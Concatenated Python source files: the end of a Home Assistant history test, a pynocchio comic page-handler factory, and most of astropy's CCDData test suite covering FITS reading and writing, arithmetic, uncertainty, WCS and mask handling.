                time.sleep(1)
                point = dt_util.utcnow()
        self.assertEqual(
            states,
            sorted(
                history.get_states(point), key=lambda state: state.entity_id))
        # Test get_state here because we have a DB setup
        self.assertEqual(
            states[0], history.get_state(point, states[0].entity_id))
    def test_state_changes_during_period(self):
        self.init_recorder()
        entity_id = 'media_player.test'
        def set_state(state):
            self.hass.states.set(entity_id, state)
            self.hass.pool.block_till_done()
            recorder._INSTANCE.block_till_done()
            return self.hass.states.get(entity_id)
        # States before `start` and after `end` must not be included.
        set_state('idle')
        set_state('YouTube')
        start = dt_util.utcnow()
        time.sleep(1)
        states = [
            set_state('idle'),
            set_state('Netflix'),
            set_state('Plex'),
            set_state('YouTube'),
        ]
        time.sleep(1)
        end = dt_util.utcnow()
        set_state('Netflix')
        set_state('Plex')
        self.assertEqual(
            {entity_id: states},
            history.state_changes_during_period(start, end, entity_id))
|
pynocchio-comic-reader/pynocchio-comic-reader | refs/heads/develop | pynocchio/comic_page_handler_factory.py | 5 | from .comic_page_handler import (ComicPageHandlerDoublePage,
ComicPageHandlerSinglePage)
class ComicPageHandlerFactory():
    """Build the page handler matching the reader's page mode."""
    # Maps the double-page flag to the handler class to instantiate.
    read_mode = {
        False: ComicPageHandlerSinglePage,
        True: ComicPageHandlerDoublePage,
    }
    @staticmethod
    def create_handler(page_read_mode, comic, index=0):
        """Instantiate the handler for *page_read_mode* over *comic*,
        starting at page *index*."""
        return ComicPageHandlerFactory.read_mode[page_read_mode](comic,
                                                                 index=index)
|
funbaker/astropy | refs/heads/master | astropy/nddata/tests/test_ccddata.py | 2 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
# This module implements the base CCDData class.
import textwrap
import numpy as np
import pytest
from ...io import fits
from ..nduncertainty import StdDevUncertainty, MissingDataAssociationException
from ... import units as u
from ... import log
from ...wcs import WCS, FITSFixedWarning
from ...tests.helper import catch_warnings
from ...utils import NumpyRNGContext
from ...utils.data import (get_pkg_data_filename, get_pkg_data_filenames,
get_pkg_data_contents)
from ..ccddata import CCDData
# If additional pytest markers are defined the key in the dictionary below
# should be the name of the marker.
# Defaults for the ccd_data fixture; tests override entries via pytest
# markers named after the keys (e.g. @pytest.mark.data_size(N)).
DEFAULTS = {
    'seed': 123,
    'data_size': 100,
    'data_scale': 1.0,
    'data_mean': 0.0
}
# NOTE(review): these three mirror entries in DEFAULTS; the code visible
# here only reads DEFAULTS, so they look legacy — confirm before removing.
DEFAULT_SEED = 123
DEFAULT_DATA_SIZE = 100
DEFAULT_DATA_SCALE = 1.0
def value_from_markers(key, request):
    """Return the first argument of pytest marker *key*, or DEFAULTS[key]."""
    try:
        return request.keywords[key].args[0]
    except KeyError:
        return DEFAULTS[key]
@pytest.fixture
def ccd_data(request):
    """
    Return a CCDData object with units of ADU.
    The size of the data array is 100x100 but can be changed using the marker
    @pytest.mark.data_size(N) on the test function, where N should be the
    desired dimension.
    Data values are initialized to random numbers drawn from a normal
    distribution with mean of 0 and scale 1.
    The scale can be changed with the marker @pytest.mark.data_scale(s) on
    the test function, where s is the desired scale.
    The mean can be changed with the marker @pytest.mark.data_mean(m) on the
    test function, where m is the desired mean.
    """
    size = value_from_markers('data_size', request)
    scale = value_from_markers('data_scale', request)
    mean = value_from_markers('data_mean', request)
    # Fixed seed keeps the fixture deterministic across runs.
    with NumpyRNGContext(DEFAULTS['seed']):
        data = np.random.normal(loc=mean, size=[size, size], scale=scale)
    fake_meta = {'my_key': 42, 'your_key': 'not 42'}
    ccd = CCDData(data, unit=u.adu)
    ccd.header = fake_meta
    return ccd
# --- Construction and basic-attribute tests -------------------------------
def test_ccddata_empty():
    with pytest.raises(TypeError):
        CCDData()  # empty initializer should fail
def test_ccddata_must_have_unit():
    with pytest.raises(ValueError):
        CCDData(np.zeros([100, 100]))
def test_ccddata_unit_cannot_be_set_to_none(ccd_data):
    with pytest.raises(TypeError):
        ccd_data.unit = None
def test_ccddata_meta_header_conflict():
    # meta= and header= are aliases; passing both must be rejected.
    with pytest.raises(ValueError) as exc:
        CCDData([1, 2, 3], unit='', meta={1: 1}, header={2: 2})
    assert "can't have both header and meta." in str(exc)
@pytest.mark.data_size(10)
def test_ccddata_simple(ccd_data):
    assert ccd_data.shape == (10, 10)
    assert ccd_data.size == 100
    assert ccd_data.dtype == np.dtype(float)
def test_ccddata_init_with_string_electron_unit():
    ccd = CCDData(np.zeros((10, 10)), unit="electron")
    assert ccd.unit is u.electron
# --- Reading from FITS files ----------------------------------------------
@pytest.mark.data_size(10)
def test_initialize_from_FITS(ccd_data, tmpdir):
    hdu = fits.PrimaryHDU(ccd_data)
    hdulist = fits.HDUList([hdu])
    filename = tmpdir.join('afile.fits').strpath
    hdulist.writeto(filename)
    cd = CCDData.read(filename, unit=u.electron)
    assert cd.shape == (10, 10)
    assert cd.size == 100
    assert np.issubdtype(cd.data.dtype, np.floating)
    for k, v in hdu.header.items():
        assert cd.meta[k] == v
def test_initialize_from_fits_with_unit_in_header(tmpdir):
    fake_img = np.random.random(size=(100, 100))
    hdu = fits.PrimaryHDU(fake_img)
    hdu.header['bunit'] = u.adu.to_string()
    filename = tmpdir.join('afile.fits').strpath
    hdu.writeto(filename)
    ccd = CCDData.read(filename)
    # ccd should pick up the unit adu from the fits header...did it?
    assert ccd.unit is u.adu
    # An explicit unit in the read overrides any unit in the FITS file
    ccd2 = CCDData.read(filename, unit="photon")
    assert ccd2.unit is u.photon
def test_initialize_from_fits_with_ADU_in_header(tmpdir):
    # 'ADU' (uppercase string) must parse to the same unit object.
    fake_img = np.random.random(size=(100, 100))
    hdu = fits.PrimaryHDU(fake_img)
    hdu.header['bunit'] = 'ADU'
    filename = tmpdir.join('afile.fits').strpath
    hdu.writeto(filename)
    ccd = CCDData.read(filename)
    # ccd should pick up the unit adu from the fits header...did it?
    assert ccd.unit is u.adu
def test_initialize_from_fits_with_data_in_different_extension(tmpdir):
    # With an empty primary HDU the data should be found in extension 1.
    fake_img = np.random.random(size=(100, 100))
    hdu1 = fits.PrimaryHDU()
    hdu2 = fits.ImageHDU(fake_img)
    hdus = fits.HDUList([hdu1, hdu2])
    filename = tmpdir.join('afile.fits').strpath
    hdus.writeto(filename)
    with catch_warnings(FITSFixedWarning) as w:
        ccd = CCDData.read(filename, unit='adu')
        assert len(w) == 0
    # ccd should pick up the unit adu from the fits header...did it?
    np.testing.assert_array_equal(ccd.data, fake_img)
    # check that the header is the combined header
    assert hdu2.header + hdu1.header == ccd.header
def test_initialize_from_fits_with_extension(tmpdir):
    # An explicit hdu= index selects which extension to read.
    fake_img1 = np.random.random(size=(100, 100))
    fake_img2 = np.random.random(size=(100, 100))
    hdu0 = fits.PrimaryHDU()
    hdu1 = fits.ImageHDU(fake_img1)
    hdu2 = fits.ImageHDU(fake_img2)
    hdus = fits.HDUList([hdu0, hdu1, hdu2])
    filename = tmpdir.join('afile.fits').strpath
    hdus.writeto(filename)
    ccd = CCDData.read(filename, hdu=2, unit='adu')
    # ccd should pick up the unit adu from the fits header...did it?
    np.testing.assert_array_equal(ccd.data, fake_img2)
def test_write_unit_to_hdu(ccd_data, tmpdir):
ccd_unit = ccd_data.unit
hdulist = ccd_data.to_hdu()
assert 'bunit' in hdulist[0].header
assert hdulist[0].header['bunit'] == ccd_unit.to_string()
def test_initialize_from_FITS_bad_keyword_raises_error(ccd_data, tmpdir):
# There are two fits.open keywords that are not permitted in ccdproc:
# do_not_scale_image_data and scale_back
filename = tmpdir.join('test.fits').strpath
ccd_data.write(filename)
with pytest.raises(TypeError):
CCDData.read(filename, unit=ccd_data.unit,
do_not_scale_image_data=True)
with pytest.raises(TypeError):
CCDData.read(filename, unit=ccd_data.unit, scale_back=True)
def test_ccddata_writer(ccd_data, tmpdir):
filename = tmpdir.join('test.fits').strpath
ccd_data.write(filename)
ccd_disk = CCDData.read(filename, unit=ccd_data.unit)
np.testing.assert_array_equal(ccd_data.data, ccd_disk.data)
def test_ccddata_meta_is_case_sensitive(ccd_data):
key = 'SoMeKEY'
ccd_data.meta[key] = 10
assert key.lower() not in ccd_data.meta
assert key.upper() not in ccd_data.meta
assert key in ccd_data.meta
def test_ccddata_meta_is_not_fits_header(ccd_data):
ccd_data.meta = {'OBSERVER': 'Edwin Hubble'}
assert not isinstance(ccd_data.meta, fits.Header)
def test_fromMEF(ccd_data, tmpdir):
hdu = fits.PrimaryHDU(ccd_data)
hdu2 = fits.PrimaryHDU(2 * ccd_data.data)
hdulist = fits.HDUList(hdu)
hdulist.append(hdu2)
filename = tmpdir.join('afile.fits').strpath
hdulist.writeto(filename)
# by default, we reading from the first extension
cd = CCDData.read(filename, unit=u.electron)
np.testing.assert_array_equal(cd.data, ccd_data.data)
# but reading from the second should work too
cd = CCDData.read(filename, hdu=1, unit=u.electron)
np.testing.assert_array_equal(cd.data, 2 * ccd_data.data)
def test_metafromheader(ccd_data):
    """A fits.Header passed as meta is exposed via both ``meta`` and ``header``."""
    hdr = fits.header.Header()
    hdr['observer'] = 'Edwin Hubble'
    hdr['exptime'] = '3600'
    d1 = CCDData(np.ones((5, 5)), meta=hdr, unit=u.electron)
    assert d1.meta['OBSERVER'] == 'Edwin Hubble'
    assert d1.header['OBSERVER'] == 'Edwin Hubble'
def test_metafromdict():
    """A plain dict is accepted as metadata."""
    dic = {'OBSERVER': 'Edwin Hubble', 'EXPTIME': 3600}
    d1 = CCDData(np.ones((5, 5)), meta=dic, unit=u.electron)
    assert d1.meta['OBSERVER'] == 'Edwin Hubble'
def test_header2meta():
    """Assigning to ``header`` after construction populates ``meta`` too."""
    hdr = fits.header.Header()
    hdr['observer'] = 'Edwin Hubble'
    hdr['exptime'] = '3600'
    d1 = CCDData(np.ones((5, 5)), unit=u.electron)
    d1.header = hdr
    assert d1.meta['OBSERVER'] == 'Edwin Hubble'
    assert d1.header['OBSERVER'] == 'Edwin Hubble'
def test_metafromstring_fail():
    """A bare string is not a valid metadata mapping."""
    hdr = 'this is not a valid header'
    with pytest.raises(TypeError):
        CCDData(np.ones((5, 5)), meta=hdr, unit=u.adu)
def test_setting_bad_uncertainty_raises_error(ccd_data):
    with pytest.raises(TypeError):
        # Uncertainty is supposed to be an instance of NDUncertainty
        ccd_data.uncertainty = 10
def test_setting_uncertainty_with_array(ccd_data):
    """A plain ndarray assigned to ``uncertainty`` is wrapped and kept."""
    ccd_data.uncertainty = None
    fake_uncertainty = np.sqrt(np.abs(ccd_data.data))
    ccd_data.uncertainty = fake_uncertainty.copy()
    np.testing.assert_array_equal(ccd_data.uncertainty.array, fake_uncertainty)
def test_setting_uncertainty_wrong_shape_raises_error(ccd_data):
    """Uncertainty arrays must match the shape of the data."""
    with pytest.raises(ValueError):
        ccd_data.uncertainty = np.random.random(size=(3, 4))
def test_to_hdu(ccd_data):
    """``to_hdu()`` returns an HDUList carrying both metadata and data."""
    ccd_data.meta = {'observer': 'Edwin Hubble'}
    fits_hdulist = ccd_data.to_hdu()
    assert isinstance(fits_hdulist, fits.HDUList)
    for k, v in ccd_data.meta.items():
        assert fits_hdulist[0].header[k] == v
    np.testing.assert_array_equal(fits_hdulist[0].data, ccd_data.data)
def test_copy(ccd_data):
    """A copy must reproduce the data, unit and metadata of the source."""
    duplicate = ccd_data.copy()
    np.testing.assert_array_equal(duplicate.data, ccd_data.data)
    for attribute in ('unit', 'meta'):
        assert getattr(duplicate, attribute) == getattr(ccd_data, attribute)
@pytest.mark.parametrize('operation,affects_uncertainty', [
                         ("multiply", True),
                         ("divide", True),
                         ])
@pytest.mark.parametrize('operand', [
                         2.0,
                         2 * u.dimensionless_unscaled,
                         2 * u.photon / u.adu,
                         ])
@pytest.mark.parametrize('with_uncertainty', [
                         True,
                         False])
@pytest.mark.data_unit(u.adu)
def test_mult_div_overload(ccd_data, operand, with_uncertainty,
                           operation, affects_uncertainty):
    """Multiplication/division by scalars and Quantities scales data,
    uncertainty and unit as expected, and returns a new CCDData."""
    if with_uncertainty:
        ccd_data.uncertainty = StdDevUncertainty(np.ones_like(ccd_data))
    # Resolve the CCDData method and the matching numpy ufunc by name.
    method = ccd_data.__getattribute__(operation)
    np_method = np.__getattribute__(operation)
    result = method(operand)
    assert result is not ccd_data
    assert isinstance(result, CCDData)
    assert (result.uncertainty is None or
            isinstance(result.uncertainty, StdDevUncertainty))
    # Quantities carry the numeric part in .value; plain scalars do not.
    try:
        op_value = operand.value
    except AttributeError:
        op_value = operand
    np.testing.assert_array_equal(result.data,
                                  np_method(ccd_data.data, op_value))
    if with_uncertainty:
        if affects_uncertainty:
            np.testing.assert_array_equal(result.uncertainty.array,
                                          np_method(ccd_data.uncertainty.array,
                                                    op_value))
        else:
            np.testing.assert_array_equal(result.uncertainty.array,
                                          ccd_data.uncertainty.array)
    else:
        assert result.uncertainty is None
    if isinstance(operand, u.Quantity):
        # Need the "1 *" below to force arguments to be Quantity to work around
        # astropy/astropy#2377
        expected_unit = np_method(1 * ccd_data.unit, 1 * operand.unit).unit
        assert result.unit == expected_unit
    else:
        assert result.unit == ccd_data.unit
@pytest.mark.parametrize('operation,affects_uncertainty', [
                         ("add", False),
                         ("subtract", False),
                         ])
@pytest.mark.parametrize('operand,expect_failure', [
                         (2.0, u.UnitsError),  # fail--units don't match image
                         (2 * u.dimensionless_unscaled, u.UnitsError),  # same
                         (2 * u.adu, False),
                         ])
@pytest.mark.parametrize('with_uncertainty', [
                         True,
                         False])
@pytest.mark.data_unit(u.adu)
def test_add_sub_overload(ccd_data, operand, expect_failure, with_uncertainty,
                          operation, affects_uncertainty):
    """Addition/subtraction requires matching units; uncertainty is
    unaffected by a scalar-like operand."""
    if with_uncertainty:
        ccd_data.uncertainty = StdDevUncertainty(np.ones_like(ccd_data))
    method = ccd_data.__getattribute__(operation)
    np_method = np.__getattribute__(operation)
    # Unit-incompatible operands must raise rather than produce a result.
    if expect_failure:
        with pytest.raises(expect_failure):
            result = method(operand)
        return
    else:
        result = method(operand)
    assert result is not ccd_data
    assert isinstance(result, CCDData)
    assert (result.uncertainty is None or
            isinstance(result.uncertainty, StdDevUncertainty))
    try:
        op_value = operand.value
    except AttributeError:
        op_value = operand
    np.testing.assert_array_equal(result.data,
                                  np_method(ccd_data.data, op_value))
    if with_uncertainty:
        if affects_uncertainty:
            np.testing.assert_array_equal(result.uncertainty.array,
                                          np_method(ccd_data.uncertainty.array,
                                                    op_value))
        else:
            np.testing.assert_array_equal(result.uncertainty.array,
                                          ccd_data.uncertainty.array)
    else:
        assert result.uncertainty is None
    if isinstance(operand, u.Quantity):
        assert (result.unit == ccd_data.unit and result.unit == operand.unit)
    else:
        assert result.unit == ccd_data.unit
def test_arithmetic_overload_fails(ccd_data):
    """Arithmetic with a non-numeric operand raises TypeError."""
    with pytest.raises(TypeError):
        ccd_data.multiply("five")
    with pytest.raises(TypeError):
        ccd_data.divide("five")
    with pytest.raises(TypeError):
        ccd_data.add("five")
    with pytest.raises(TypeError):
        ccd_data.subtract("five")
def test_arithmetic_no_wcs_compare():
    """With ``compare_wcs=None`` the result simply carries no WCS."""
    ccd = CCDData(np.ones((10, 10)), unit='')
    assert ccd.add(ccd, compare_wcs=None).wcs is None
    assert ccd.subtract(ccd, compare_wcs=None).wcs is None
    assert ccd.multiply(ccd, compare_wcs=None).wcs is None
    assert ccd.divide(ccd, compare_wcs=None).wcs is None
def test_arithmetic_with_wcs_compare():
    """A ``compare_wcs`` callable that accepts keeps the first operand's WCS."""
    def return_diff_smaller_3(first, second):
        return abs(first - second) <= 3
    # Integers stand in for real WCS objects here; only identity matters.
    ccd1 = CCDData(np.ones((10, 10)), unit='', wcs=2)
    ccd2 = CCDData(np.ones((10, 10)), unit='', wcs=5)
    assert ccd1.add(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
    assert ccd1.subtract(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
    assert ccd1.multiply(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
    assert ccd1.divide(ccd2, compare_wcs=return_diff_smaller_3).wcs == 2
def test_arithmetic_with_wcs_compare_fail():
    """A ``compare_wcs`` callable that rejects makes the operation raise."""
    def return_diff_smaller_1(first, second):
        return abs(first - second) <= 1
    ccd1 = CCDData(np.ones((10, 10)), unit='', wcs=2)
    ccd2 = CCDData(np.ones((10, 10)), unit='', wcs=5)
    with pytest.raises(ValueError):
        ccd1.add(ccd2, compare_wcs=return_diff_smaller_1).wcs
    with pytest.raises(ValueError):
        ccd1.subtract(ccd2, compare_wcs=return_diff_smaller_1).wcs
    with pytest.raises(ValueError):
        ccd1.multiply(ccd2, compare_wcs=return_diff_smaller_1).wcs
    with pytest.raises(ValueError):
        ccd1.divide(ccd2, compare_wcs=return_diff_smaller_1).wcs
def test_arithmetic_overload_ccddata_operand(ccd_data):
    """CCDData op CCDData combines std-dev uncertainties in quadrature."""
    ccd_data.uncertainty = StdDevUncertainty(np.ones_like(ccd_data))
    operand = ccd_data.copy()
    result = ccd_data.add(operand)
    assert len(result.meta) == 0
    np.testing.assert_array_equal(result.data,
                                  2 * ccd_data.data)
    np.testing.assert_array_equal(result.uncertainty.array,
                                  np.sqrt(2) * ccd_data.uncertainty.array)
    result = ccd_data.subtract(operand)
    assert len(result.meta) == 0
    np.testing.assert_array_equal(result.data,
                                  0 * ccd_data.data)
    np.testing.assert_array_equal(result.uncertainty.array,
                                  np.sqrt(2) * ccd_data.uncertainty.array)
    result = ccd_data.multiply(operand)
    assert len(result.meta) == 0
    np.testing.assert_array_equal(result.data,
                                  ccd_data.data ** 2)
    expected_uncertainty = (np.sqrt(2) * np.abs(ccd_data.data) *
                            ccd_data.uncertainty.array)
    np.testing.assert_allclose(result.uncertainty.array,
                               expected_uncertainty)
    result = ccd_data.divide(operand)
    assert len(result.meta) == 0
    np.testing.assert_array_equal(result.data,
                                  np.ones_like(ccd_data.data))
    expected_uncertainty = (np.sqrt(2) / np.abs(ccd_data.data) *
                            ccd_data.uncertainty.array)
    np.testing.assert_allclose(result.uncertainty.array,
                               expected_uncertainty)
def test_arithmetic_overload_differing_units():
    """Operands with different but compatible units follow Quantity rules."""
    a = np.array([1, 2, 3]) * u.m
    b = np.array([1, 2, 3]) * u.cm
    ccddata = CCDData(a)
    # TODO: Could also be parametrized.
    res = ccddata.add(b)
    np.testing.assert_array_almost_equal(res.data, np.add(a, b).value)
    assert res.unit == np.add(a, b).unit
    res = ccddata.subtract(b)
    np.testing.assert_array_almost_equal(res.data, np.subtract(a, b).value)
    assert res.unit == np.subtract(a, b).unit
    res = ccddata.multiply(b)
    np.testing.assert_array_almost_equal(res.data, np.multiply(a, b).value)
    assert res.unit == np.multiply(a, b).unit
    res = ccddata.divide(b)
    np.testing.assert_array_almost_equal(res.data, np.divide(a, b).value)
    assert res.unit == np.divide(a, b).unit
def test_arithmetic_add_with_array():
    """Adding a bare array works only for dimensionless CCDData."""
    ccd = CCDData(np.ones((3, 3)), unit='')
    res = ccd.add(np.arange(3))
    np.testing.assert_array_equal(res.data, [[1, 2, 3]] * 3)
    ccd = CCDData(np.ones((3, 3)), unit='adu')
    with pytest.raises(ValueError):
        ccd.add(np.arange(3))
def test_arithmetic_subtract_with_array():
    """Subtracting a bare array works only for dimensionless CCDData."""
    ccd = CCDData(np.ones((3, 3)), unit='')
    res = ccd.subtract(np.arange(3))
    np.testing.assert_array_equal(res.data, [[1, 0, -1]] * 3)
    ccd = CCDData(np.ones((3, 3)), unit='adu')
    with pytest.raises(ValueError):
        ccd.subtract(np.arange(3))
def test_arithmetic_multiply_with_array():
    """Multiplying by a bare array keeps the CCDData unit."""
    ccd = CCDData(np.ones((3, 3)) * 3, unit=u.m)
    res = ccd.multiply(np.ones((3, 3)) * 2)
    np.testing.assert_array_equal(res.data, [[6, 6, 6]] * 3)
    assert res.unit == ccd.unit
def test_arithmetic_divide_with_array():
    """Dividing by a bare array keeps the CCDData unit."""
    ccd = CCDData(np.ones((3, 3)), unit=u.m)
    res = ccd.divide(np.ones((3, 3)) * 2)
    np.testing.assert_array_equal(res.data, [[0.5, 0.5, 0.5]] * 3)
    assert res.unit == ccd.unit
def test_history_preserved_if_metadata_is_fits_header(tmpdir):
    """Multiple HISTORY cards must survive a write/read round trip."""
    fake_img = np.random.random(size=(100, 100))
    hdu = fits.PrimaryHDU(fake_img)
    # Repeated assignment to 'history' appends cards rather than replacing.
    hdu.header['history'] = 'one'
    hdu.header['history'] = 'two'
    hdu.header['history'] = 'three'
    assert len(hdu.header['history']) == 3
    tmp_file = tmpdir.join('temp.fits').strpath
    hdu.writeto(tmp_file)
    ccd_read = CCDData.read(tmp_file, unit="adu")
    assert ccd_read.header['history'] == hdu.header['history']
def test_infol_logged_if_unit_in_fits_header(ccd_data, tmpdir):
    """Overriding a header unit on read is reported via the astropy log."""
    tmpfile = tmpdir.join('temp.fits')
    ccd_data.write(tmpfile.strpath)
    log.setLevel('INFO')
    explicit_unit_name = "photon"
    with log.log_to_list() as log_list:
        ccd_from_disk = CCDData.read(tmpfile.strpath, unit=explicit_unit_name)
        assert explicit_unit_name in log_list[0].message
def test_wcs_attribute(ccd_data, tmpdir):
    """
    Check that WCS attribute gets added to header, and that if a CCDData
    object is created from a FITS file with a header, and the WCS attribute
    is modified, then the CCDData object is turned back into an hdu, the
    WCS object overwrites the old WCS information in the header.
    """
    tmpfile = tmpdir.join('temp.fits')
    # This wcs example is taken from the astropy.wcs docs.
    wcs = WCS(naxis=2)
    wcs.wcs.crpix = np.array(ccd_data.shape) / 2
    wcs.wcs.cdelt = np.array([-0.066667, 0.066667])
    wcs.wcs.crval = [0, -90]
    wcs.wcs.ctype = ["RA---AIR", "DEC--AIR"]
    wcs.wcs.set_pv([(2, 1, 45.0)])
    ccd_data.header = ccd_data.to_hdu()[0].header
    ccd_data.header.extend(wcs.to_header(), useblanks=False)
    ccd_data.write(tmpfile.strpath)
    # Get the header length after it has been extended by the WCS keywords
    original_header_length = len(ccd_data.header)
    ccd_new = CCDData.read(tmpfile.strpath)
    # WCS attribute should be set for ccd_new
    assert ccd_new.wcs is not None
    # WCS attribute should be equal to wcs above.
    assert ccd_new.wcs.wcs == wcs.wcs
    # Converting CCDData object with wcs to an hdu shouldn't
    # create duplicate wcs-related entries in the header.
    ccd_new_hdu = ccd_new.to_hdu()[0]
    assert len(ccd_new_hdu.header) == original_header_length
    # Making a CCDData with WCS (but not WCS in the header) should lead to
    # WCS information in the header when it is converted to an HDU.
    ccd_wcs_not_in_header = CCDData(ccd_data.data, wcs=wcs, unit="adu")
    hdu = ccd_wcs_not_in_header.to_hdu()[0]
    wcs_header = wcs.to_header()
    for k in wcs_header.keys():
        # Skip these keywords if they are in the WCS header because they are
        # not WCS-specific.
        if k in ['', 'COMMENT', 'HISTORY']:
            continue
        # No keyword from the WCS should be in the header.
        assert k not in ccd_wcs_not_in_header.header
        # Every keyword in the WCS should be in the header of the HDU
        assert hdu.header[k] == wcs_header[k]
    # Now check that if WCS of a CCDData is modified, then the CCDData is
    # converted to an HDU, the WCS keywords in the header are overwritten
    # with the appropriate keywords from the header.
    #
    # ccd_new has a WCS and WCS keywords in the header, so try modifying
    # the WCS.
    ccd_new.wcs.wcs.cdelt *= 2
    ccd_new_hdu_mod_wcs = ccd_new.to_hdu()[0]
    assert ccd_new_hdu_mod_wcs.header['CDELT1'] == ccd_new.wcs.wcs.cdelt[0]
    assert ccd_new_hdu_mod_wcs.header['CDELT2'] == ccd_new.wcs.wcs.cdelt[1]
def test_wcs_keywords_removed_from_header():
    """
    Test, for the file included with the nddata tests, that WCS keywords are
    properly removed from header.
    """
    from ..ccddata import _KEEP_THESE_KEYWORDS_IN_HEADER
    keepers = set(_KEEP_THESE_KEYWORDS_IN_HEADER)
    data_file = get_pkg_data_filename('data/sip-wcs.fits')
    ccd = CCDData.read(data_file)
    wcs_header = ccd.wcs.to_header()
    # No WCS keyword (other than the whitelisted ones) may remain in meta.
    assert not (set(wcs_header) & set(ccd.meta) - keepers)
    # Make sure that exceptions are not raised when trying to remove missing
    # keywords. o4sp040b0_raw.fits of io.fits is missing keyword 'PC1_1'.
    data_file1 = get_pkg_data_filename('../../io/fits/tests/data/o4sp040b0_raw.fits')
    ccd = CCDData.read(data_file1, unit='count')
def test_wcs_keyword_removal_for_wcs_test_files():
    """
    Test, for the WCS test files, that keyword removal works as
    expected. Those cover a much broader range of WCS types than
    test_wcs_keywords_removed_from_header
    """
    from ..ccddata import _generate_wcs_and_update_header
    from ..ccddata import _KEEP_THESE_KEYWORDS_IN_HEADER
    keepers = set(_KEEP_THESE_KEYWORDS_IN_HEADER)
    wcs_headers = get_pkg_data_filenames('../../wcs/tests/data',
                                         pattern='*.hdr')
    for hdr in wcs_headers:
        # Skip the files that are expected to be bad...
        if 'invalid' in hdr or 'nonstandard' in hdr or 'segfault' in hdr:
            continue
        header_string = get_pkg_data_contents(hdr)
        wcs = WCS(header_string)
        header = wcs.to_header(relax=True)
        new_header, new_wcs = _generate_wcs_and_update_header(header)
        # Make sure all of the WCS-related keywords have been removed.
        assert not (set(new_header) &
                    set(new_wcs.to_header(relax=True)) -
                    keepers)
        # Check that the new wcs is the same as the old.
        new_wcs_header = new_wcs.to_header(relax=True)
        for k, v in new_wcs_header.items():
            if isinstance(v, str):
                assert header[k] == v
            else:
                # Floating-point WCS values may round-trip inexactly.
                np.testing.assert_almost_equal(header[k], v)
def test_read_wcs_not_creatable(tmpdir):
    """A header whose WCS cannot be constructed must still be readable,
    with ``wcs`` left as None."""
    # The following Header can't be converted to a WCS object. See also #6499.
    hdr_txt_example_WCS = textwrap.dedent('''
    SIMPLE = T / Fits standard
    BITPIX = 16 / Bits per pixel
    NAXIS = 2 / Number of axes
    NAXIS1 = 1104 / Axis length
    NAXIS2 = 4241 / Axis length
    CRVAL1 = 164.98110962 / Physical value of the reference pixel X
    CRVAL2 = 44.34089279 / Physical value of the reference pixel Y
    CRPIX1 = -34.0 / Reference pixel in X (pixel)
    CRPIX2 = 2041.0 / Reference pixel in Y (pixel)
    CDELT1 = 0.10380000 / X Scale projected on detector (#/pix)
    CDELT2 = 0.10380000 / Y Scale projected on detector (#/pix)
    CTYPE1 = 'RA---TAN' / Pixel coordinate system
    CTYPE2 = 'WAVELENGTH' / Pixel coordinate system
    CUNIT1 = 'degree ' / Units used in both CRVAL1 and CDELT1
    CUNIT2 = 'nm ' / Units used in both CRVAL2 and CDELT2
    CD1_1 = 0.20760000 / Pixel Coordinate translation matrix
    CD1_2 = 0.00000000 / Pixel Coordinate translation matrix
    CD2_1 = 0.00000000 / Pixel Coordinate translation matrix
    CD2_2 = 0.10380000 / Pixel Coordinate translation matrix
    C2YPE1 = 'RA---TAN' / Pixel coordinate system
    C2YPE2 = 'DEC--TAN' / Pixel coordinate system
    C2NIT1 = 'degree ' / Units used in both C2VAL1 and C2ELT1
    C2NIT2 = 'degree ' / Units used in both C2VAL2 and C2ELT2
    RADECSYS= 'FK5 ' / The equatorial coordinate system
    ''')
    with catch_warnings(FITSFixedWarning):
        hdr = fits.Header.fromstring(hdr_txt_example_WCS, sep='\n')
    hdul = fits.HDUList([fits.PrimaryHDU(np.ones((4241, 1104)), header=hdr)])
    filename = tmpdir.join('afile.fits').strpath
    hdul.writeto(filename)
    # The hdr cannot be converted to a WCS object because of an
    # InconsistentAxisTypesError but it should still open the file
    ccd = CCDData.read(filename, unit='adu')
    assert ccd.wcs is None
def test_header(ccd_data):
    """A dict passed as ``header`` must end up as the ``meta`` mapping."""
    hdr = {'Observer': 'Hubble'}
    assert CCDData(ccd_data, header=hdr).meta == hdr
def test_wcs_arithmetic(ccd_data):
    """Scalar arithmetic carries the (placeholder) wcs through unchanged."""
    ccd_data.wcs = 5
    result = ccd_data.multiply(1.0)
    assert result.wcs == 5
@pytest.mark.parametrize('operation',
                         ['multiply', 'divide', 'add', 'subtract'])
def test_wcs_arithmetic_ccd(ccd_data, operation):
    """CCDData-CCDData arithmetic keeps the first operand's wcs only."""
    ccd_data2 = ccd_data.copy()
    ccd_data.wcs = 5
    method = ccd_data.__getattribute__(operation)
    result = method(ccd_data2)
    assert result.wcs == ccd_data.wcs
    assert ccd_data2.wcs is None
def test_wcs_sip_handling():
    """
    Check whether the ctypes RA---TAN-SIP and DEC--TAN-SIP survive
    a roundtrip unchanged.
    """
    data_file = get_pkg_data_filename('data/sip-wcs.fits')
    def check_wcs_ctypes(header):
        # One boolean per expected CTYPE card: True if it matches.
        expected_wcs_ctypes = {
            'CTYPE1': 'RA---TAN-SIP',
            'CTYPE2': 'DEC--TAN-SIP'
        }
        return [header[k] == v for k, v in expected_wcs_ctypes.items()]
    ccd_original = CCDData.read(data_file)
    # After initialization the keywords should be in the WCS, not in the
    # meta.
    with fits.open(data_file) as raw:
        good_ctype = check_wcs_ctypes(raw[0].header)
    assert all(good_ctype)
    ccd_new = ccd_original.to_hdu()
    good_ctype = check_wcs_ctypes(ccd_new[0].header)
    assert all(good_ctype)
    # Try converting to header with wcs_relax=False and
    # the header should contain the CTYPE keywords without
    # the -SIP
    ccd_no_relax = ccd_original.to_hdu(wcs_relax=False)
    good_ctype = check_wcs_ctypes(ccd_no_relax[0].header)
    assert not any(good_ctype)
    assert ccd_no_relax[0].header['CTYPE1'] == 'RA---TAN'
    assert ccd_no_relax[0].header['CTYPE2'] == 'DEC--TAN'
@pytest.mark.parametrize('operation',
                         ['multiply', 'divide', 'add', 'subtract'])
def test_mask_arithmetic_ccd(ccd_data, operation):
    """The mask of the first operand propagates to the result."""
    ccd_data2 = ccd_data.copy()
    ccd_data.mask = (ccd_data.data > 0)
    method = ccd_data.__getattribute__(operation)
    result = method(ccd_data2)
    np.testing.assert_equal(result.mask, ccd_data.mask)
def test_write_read_multiextensionfits_mask_default(ccd_data, tmpdir):
    # Test that if a mask is present the mask is saved and loaded by default.
